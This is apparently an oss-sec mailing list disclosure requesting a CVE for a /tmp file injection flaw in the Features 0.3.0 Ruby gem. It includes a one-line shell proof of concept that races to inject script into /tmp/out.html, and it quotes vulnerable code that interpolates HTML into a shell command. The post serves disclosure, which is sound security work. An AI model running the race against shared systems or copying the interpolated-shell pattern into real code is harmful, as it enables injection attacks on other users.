oss-sec mailing list archives

Features 0.3.0 Ruby gem /tmp file injection vulnerability

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 09 Sep 2013 17:38:46 +0000 (GMT)

Hi, May I have a CVE for the following vulnerability?


Title: Features 0.3.0 Ruby gem /tmp file injection vulnerability

Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0 
Download: http://rubygems.org/gems/features
CVE: TBD
Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"
Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html
By a malicious user creating /tmp/out.html first and repeatedly writing to it they can inject malicious html into the 
file right before it is about to be opened.
PoC:
nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
Will pop up a java script alert in other gem users browser. 
Code:
Vulnerabile code in ./features-0.3.0/lib/suite.rb

html = parse_results(results).html
%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end
def parse_results_and_open_in_safari(results) -- end
def open_in_safari(html)
%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end

Vendor: Not notified

Current thread:

Features 0.3.0 Ruby gem /tmp file injection vulnerability Larry W. Cashdollar (Sep 09)
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Kurt Seifried (Sep 09)
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Henri Salo (Sep 10)
- <Possible follow-ups>
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Larry W. Cashdollar (Sep 10)